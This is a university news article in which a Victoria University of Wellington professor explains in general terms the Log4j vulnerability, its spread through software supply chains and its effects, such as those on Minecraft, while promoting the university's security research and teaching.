The internet was on fire and so was Minecraft
Associate Professor Jens Dietrich from Te Herenga Waka—Victoria University of Wellington explains how a Log4j vulnerability can offer hackers an easy way to access an organisation's computer server.
Earlier this week a new software vulnerability started to make headlines in major news outlets, with WIRED headlining that "The Internet is on Fire".
Associate Professor Dietrich, from Wellington’s School of Engineering and Computer Science, explains what happened, “A researcher found a vulnerability in a widely used software component called Log4j. It turns out a large number of programmes are using this component, often without being aware of this; they don't use it directly, but indirectly through other components. The issue was amplified by the fact that industry uses increasingly complex software supply chains of such components. While this is perhaps not surprising for business applications, the vulnerability then also showed up in some unexpected places, such as in the popular game Minecraft.
“The Log4j component is actually really useful. It is used to log messages during the execution of a programme to be used later for diagnostics purposes. The problem is that the messages are not just text to be read by a human, but can encode some complex logic. In particular, there is a little known feature to write a message in a certain format that establishes a network connection to an arbitrary server. In some cases it is possible to feed these messages to a programme by simply using a standard web browser. This can then be used by an attacker to load and execute arbitrary code on the machine that runs the programme. With this in place, all sorts of attacks become possible, for instance encrypting some files and blackmailing the owner of the software. This was the idea behind the recent Waikato hospital ransomware attack.”
Vulnerabilities like this are surprisingly common and there is a rapidly growing registry (the so-called CVE Database) to keep track of them. There are more than 19,000 vulnerabilities already discovered and registered in 2021.
“While there is active research in new methods and tools to develop software that does not allow such vulnerabilities ‘by design’ (some spearheaded by the Programming Language Research group at Te Herenga Waka—Victoria University of Wellington), there is a large amount of components written with today's tools that is here to stay for a long time,” says Associate Professor Dietrich.
“The presence of vulnerabilities and other bugs demonstrates that with software we have a tool to create complexity we struggle to understand and control (perhaps a bit like the stock market). In particular, we need much better methods to understand the impact the widespread reuse of code from open source repositories like GitHub has.
“This is an exciting prospect for anybody who is interested in software engineering and cybersecurity. At Te Herenga Waka, we have some great programmes in these areas to prepare students for future careers in this field. Several staff are actively researching security aspects of code, developing new exciting tools for this purpose, and have experienced success in discovering vulnerabilities and critical flaws in widely used commodity software.”